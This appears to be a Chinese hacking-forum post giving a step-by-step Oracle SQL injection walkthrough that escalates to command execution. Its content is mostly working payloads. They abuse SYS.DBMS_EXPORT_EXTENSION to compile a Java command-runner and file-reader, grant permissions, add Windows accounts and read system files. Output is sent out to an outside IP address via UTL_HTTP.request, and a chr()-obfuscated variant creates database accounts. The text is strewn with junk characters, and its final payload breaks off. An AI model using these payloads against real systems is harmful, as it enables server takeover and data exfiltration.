找回密码
 立即注册
中国网络渗透测试联盟»论坛 --==渗透测试区{ Penetration testing area }==-- web app渗透测试::『Web App penetration testing』 实例演示oracle注入获取cmdshell的全过程
返回列表 发新帖
查看: 2919|回复: 0
打印 上一主题 下一主题

实例演示oracle注入获取cmdshell的全过程

[复制链接]
admin
跳转到指定楼层
楼主
发表于 2012-12-18 12:21:48 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
以下的演示都是在web上的sql plus执行的,在web注入时 把select SYS.DBMS_EXPORT_EXTENSION.....改成 ' D* {  a& U# T+ L3 e( S

$ k) x( x% T3 z3 L) |  /xxx.jsp?id=1 and '1'<>'a'||(select SYS.DBMS_EXPORT_EXTENSION.....)
' D( F+ T: I% S7 U+ E的形式即可。(用" 'a'|| "是为了让语句返回true值) * q- j2 }3 r8 h9 l; I  ?! z/ C
语句有点长,可能要用post提交。
; u3 ?) Z/ g6 a. q2 M9 Q  u: M以下是各个步骤:
! J4 n% v) }, L1.创建包
4 c- a7 I5 t  p$ E- I; m通过注入 SYS.DBMS_EXPORT_EXTENSION 函数,在oracle上创建Java包LinxUtil,里面两个函数,runCMD用于执行系统命令,readFile用于读取文件:. W$ I1 u6 y$ C7 a4 X' C$ U9 U
/xxx.jsp?id=1 and '1'<>'a'||(
% B. ~1 F: D; P' O1 i: yselect SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''
( z. l  l( p( {: `, `create or replace and compile java source named "LinxUtil" as import java.io.*; public class LinxUtil extends Object {public static String runCMD(String args) {try{BufferedReader myReader= new BufferedReader(& g8 q  X( K  s# o9 R' X9 R9 W
new InputStreamReader( Runtime.getRuntime().exec(args).getInputStream() ) ); String stemp,str="";while ((stemp = myReader.readLine()) != null) str +=stemp+"\n";myReader.close();return str;} catch (Exception e){return e.toString();}}public static String readFile(String filename){try{BufferedReader myReader= new BufferedReader(new FileReader(filename)); String stemp,str="";while ((stemp = myReader.readLine()) != null) str +=stemp+"\n";myReader.close();return str;} catch (Exception e){return e.toString();}}
) [. g3 i# {+ ]5 b/ A9 P$ C}'''';END;'';END;--','SYS',0,'1',0) from dual
0 l2 I% L$ R4 o)
: M; g, v4 u4 K------------------------   f2 t, V  [: K4 a4 c
如果url有长度限制,可以把readFile()函数块去掉,即:
) e# V( ]- q, k- S2 k/xxx.jsp?id=1 and '1'<>'a'||( # ~) o" E% {9 M9 G7 K5 r9 G  H7 g) @
select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''( w3 H5 A) X1 l$ T% e
create or replace and compile java source named "LinxUtil" as import java.io.*; public class LinxUtil extends Object {public static String runCMD(String args) {try{BufferedReader myReader= new BufferedReader(
) z$ I, F- m* Enew InputStreamReader( Runtime.getRuntime().exec(args).getInputStream() ) ); String stemp,str="";while ((stemp = myReader.readLine()) != null) str +=stemp+"\n";myReader.close();return str;} catch (Exception e){return e.toString();}}
: X' O; g+ i1 J4 `' R}'''';END;'';END;--','SYS',0,'1',0) from dual
  S1 K7 T7 w2 d8 {# }" L)
: r' L2 {3 H4 }9 P同时把后面步骤 提到的 对readFile()的处理语句去掉。
8 \7 Y' A  U# s0 m------------------------------ ! w0 c8 `8 A0 c5 M7 G, ^7 G
2.赋Java权限
' t. G: k2 t+ }4 M! T% j4 j8 gselect SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''begin dbms_java.grant_permission( ''''''''PUBLIC'''''''', ''''''''SYS:java.io.FilePermission'''''''', ''''''''<<ALL FILES>>'''''''', ''''''''execute'''''''' );end;'''';END;'';END;--','SYS',0,'1',0) from dual2 n3 n: y  ?7 u* J
3.创建函数
+ |. _6 |6 E6 J, e+ U6 F: S/ Aselect SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''/ t6 j5 q' u- f; @7 V& [1 m
create or replace function LinxRunCMD(p_cmd in varchar2)  return varchar2  as language java name ''''''''LinxUtil.runCMD(java.lang.String) return String'''''''';   '''';END;'';END;--','SYS',0,'1',0) from dual
% t/ }4 `' N/ R6 M/ R) i; |: rselect SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''8 M' ^; l) b" q6 P* t" m
create or replace function LinxReadFile(filename in varchar2)  return varchar2  as language java name ''''''''LinxUtil.readFile(java.lang.String) return String'''''''';   '''';END;'';END;--','SYS',0,'1',0) from dual1 b3 v# O) ~1 j3 S: r7 A! @8 Y
4.赋public执行函数的权限 ( _4 Z& E" b4 y+ c$ @5 z7 f
select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''grant all on LinxRunCMD to public'''';END;'';END;--','SYS',0,'1',0) from dual4 y; H5 J$ g. ^5 L! P# Y+ Q
select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''grant all on LinxReadFile to public'''';END;'';END;--','SYS',0,'1',0) from dual$ s3 Y) u( I6 o- w7 G. R
5.测试上面的几步是否成功 9 Z# q+ ]+ K: Q& S& a" _7 I; K2 `
and '1'<>'11'||(
7 j' X( f/ o0 k( x9 ]6 Hselect  OBJECT_ID from all_objects where  object_name ='LINXRUNCMD'
! g/ w0 b, `9 {$ }; c7 f)
/ I+ p5 i* W* p# w8 h3 C$ M( `and '1'<>(   T4 a) e+ k4 F( ^% R4 p' s
select  OBJECT_ID from all_objects where  object_name ='LINXREADFILE'
! i- ^9 |6 M1 e/ w6 Y)
+ v8 K/ D) G9 k. g6.执行命令: " I9 I8 W. p. X
/xxx.jsp?id=1 and '1'<>(
0 k! H5 x* r4 M9 X5 ?select  sys.LinxRunCMD('cmd /c net user linx /add') from dual
( R# b: D) [( P
# [6 c3 e& b. p' y! D% d1 g)
, E, X& |4 \' L8 p- R0 R/xxx.jsp?id=1 and '1'<>( ) o( ]  C' s; Z2 v
select  sys.LinxReadFile('c:/boot.ini') from dual2 R, [; I+ M4 `4 n+ ?
: z; X' l  p( Y' B! M9 K% R* W
)
* D; D- b/ [; }$ N1 x' a0 u: R+ N2 Z  + ?- r6 P: H3 r8 A6 E0 R
注意sys.LinxReadFile()返回的是varchar类型,不能用"and 1<>" 代替 "and '1'<>"。 : W4 R# I8 q+ O
如果要查看运行结果可以用 union : 8 V. z) `8 y& ]! N* a
/xxx.jsp?id=1 union select  sys.LinxRunCMD('cmd /c net user linx /add') from dual
9 d/ I4 y  v. ^' q或者UTL_HTTP.request(:
1 e& p1 ?% P6 J0 V) A; b) I/xxx.jsp?id=1 and '1'<>( & S2 q( L/ ^) I$ @3 `9 z
SELECT UTL_HTTP.request('http://211.71.147.3/record.php?a=LinxRunCMD:'||REPLACE(REPLACE(sys.LinxRunCMD('cmd /c net user aaa /del'),' ','%20'),'\n','%0A')) FROM dual
1 h: d. j) @- {" q0 Q; X)
9 g5 ~/ J" [, D% u/xxx.jsp?id=1 and '1'<>(
- J, r5 N( b0 X+ q- a) `' bSELECT UTL_HTTP.request('http://211.71.147.3/record.php?a=LinxRunCMD:'||REPLACE(REPLACE(sys.LinxReadFile('c:/boot.ini'),' ','%20'),'\n','%0A')) FROM dual5 ~& c% q# f8 K; {- I# S' P, X5 {
) 2 |* O$ G- Z9 G
注意:用UTL_HTTP.request时,要用 REPLACE() 把空格、换行符给替换掉,否则会无法提交http request。用utl_encode.base64_encode也可以。
" @- N( A/ c* r! C/ q4 }-------------------- 1 f" K% u- g$ }& G" }# G
6.内部变化 & F. h1 |: W- n& p( C
通过以下命令可以查看all_objects表达改变: . D2 Y) n7 g5 o- h! a. i
select  * from all_objects where  object_name like '%LINX%' or  object_name like '%Linx%'
8 D0 d: m+ s8 e0 D6 L5 f' p7.删除我们创建的函数 ' ]) j/ A: q2 b
select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''1 U3 F# f: g2 _2 m# [0 x) X0 V
drop function LinxRunCMD  '''';END;'';END;--','SYS',0,'1',0) from dual 6 n8 p3 g# O0 p! y: F# `
==================================================== / m6 }" F* `& |/ |; q5 @- W
全文结束。谨以此文赠与我的朋友。
1 w) c3 C% Q- X; x) Zlinx
0 {/ i- i3 g/ W# Z+ V# c- P; ~( y9 J124829445
2 ?* _1 y9 F: q! R4 J$ M7 a- z% }4 [2008.1.12 " B1 K. d: h; a( _6 X
linyujian@bjfu.edu.cn ; c# U/ c- X2 ~# X) B
====================================================================== ! w6 n/ Z% f* b8 E; k/ c
测试漏洞的另一方法: ) x& p* a1 g8 K7 {9 Y, \
创建oracle帐号:
( u' P( s& ^- F" _3 Lselect SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''
/ ]* x+ u8 V  J9 C; ~- @& ZCREATE USER linxsql IDENTIFIED BY linxsql'''';END;'';END;--','SYS',0,'1',0) from dual
! Q* r) B6 y' V6 r- k& }即:
$ I! N4 C$ Y  O. d6 C+ lselect SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES(chr(70)||chr(79)||chr(79),chr(66)||chr(65)||chr(82),
, c; a+ C1 y4 n4 Mchr(68)||chr(66)||chr(77)||chr(83)||chr(95)||chr(79)||chr(85)||chr(84)||chr(80)||chr(85)||chr(84)||chr(34)||chr(46)||chr(80)||chr(85)||chr(84)||chr(40)||chr(58)||chr(80)||chr(49)||chr(41)||chr(59)||chr(69)||chr(88)||chr(69)||chr(67)||chr(85)||chr(84)||chr(69)||chr(32)||chr(73)||chr(77)||chr(77)||chr(69)||chr(68)||chr(73)||chr(65)||chr(84)||chr(69)||chr(32)||chr(39)||chr(68)||chr(69)||chr(67)||chr(76)||chr(65)||chr(82)||chr(69)||chr(32)||chr(80)||chr(82)||chr(65)||chr(71)||chr(77)||chr(65)||chr(32)||chr(65)||chr(85)||chr(84)||chr(79)||chr(78)||chr(79)||chr(77)||chr(79)||chr(85)||chr(83)||chr(95)||chr(84)||chr(82)||chr(65)||chr(78)||chr(83)||chr(65)||chr(67)||chr(84)||chr(73)||chr(79)||chr(78)||chr(59)||chr(66)||chr(69)||chr(71)||chr(73)||chr(78)||chr(32)||chr(69)||chr(88)||chr(69)||chr(67)||chr(85)||chr(84)||chr(69)||chr(32)||chr(73)||chr(77)||chr(77)||chr(69)||chr(68)||chr(73)||chr(65)||chr(84)||chr(69)||chr(32)||chr(39)||chr(39)||chr(67)||chr(82)||chr(69)||chr(65)||chr(84)||chr(69)||chr(32)||chr(85)||chr(83)||chr(69)||chr(82)||chr(32)||chr(108)||chr(105)||chr(110)||chr(120)||chr(115)||chr(113)||chr(108)||chr(32)||chr(73)||chr(68)||chr(69)||chr(78)||chr(84)||chr(73)||chr(70)||chr(73)||chr(69)||chr(68)||chr(32)||chr(66)||chr(89)||chr(32)||chr(108)||chr(105)||chr(110)||chr(120)||chr(115)||chr(113)||chr(108)||chr(39)||chr(39)||chr(59)||chr(69)||chr(78)||chr(68)||chr(59)||chr(39)||chr(59)||chr(69)||chr(78)||chr(68)||chr(59)||chr(45)||chr(45),chr(83)||chr(89)||chr(83),0,chr(49),0) from dual
& ^7 h+ N& w7 A1 X# c; X确定漏洞存在:
. c0 \' M& E# X5 ^8 T9 j, d0 j0 E1<>( - `" z' p; ]7 V0 G: j
select user_id from all_users where username='LINXSQL'
: M/ q  _9 n  d) q* v5 e1 I( z) 2 \, C+ F* e9 N+ l8 P0 N7 r
给linxsql连接权限: 3 E. P9 P' \4 s( D
select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''
) q! `, Z( Q; C9 P+ RGRANT CONNECT TO linxsql'''';END;'';END;--','SYS',0,'1',0) from dual , T0 l# [& P5 }3 X7 B/ D
删除帐号:
# ?6 ^+ C& W0 L& ^- l. pselect SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(:P1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''/ m5 f% s2 e2 c
drop user LINXSQL'''';END;'';END;--','SYS',0,'1',0) from dual 3 E6 |  x( `+ w( p
====================== . L) h9 i8 ~; ~- J. m+ E
以下方法创建一个可以执行多语句的函数Linx_query(),执行成功的话返回数值"1",但权限是继承的,可能仅仅是public权限,作用似乎不大,真的要用到话可以考虑grant dba to 当前的User:  A- ^/ c7 e. J% u3 @8 W
1.jsp?id=1 and '1'<>(
9 s, W: T7 ~8 U  q  _select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(:P1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''
7 `% T" _" }2 p* i1 \# a+ p; Vcreate or replace function Linx_query (p varchar2) return number authid current_user is begin execute immediate p; return 1;  end;   '''';END;'';END;--','SYS',0,'1',0) from dual
- [8 b# L5 y# m8 X8 p# ]5 O) and ... 1.jsp?id=1 and '1'( select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT.PUT(:P1);EXECUTE IMMEDIATE
- B9 v% w3 T0 A4 J" y$ g! q& b4 l7 A )5 `0 X6 P% b3 |& W4 q# j& N
( r! U0 @5 z& \6 ~

  P% u; U& ~& T( o; `* D
7 j% ]) ^0 u" E  k- U
回复

使用道具 举报

返回列表 发新帖
高级模式
B Color Image Link Quote Code Smilies
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

Copyright © 2001-2013 Comsenz. All Rights Reserved - Powered by Discuz! X3.2
快速回复 返回顶部 返回列表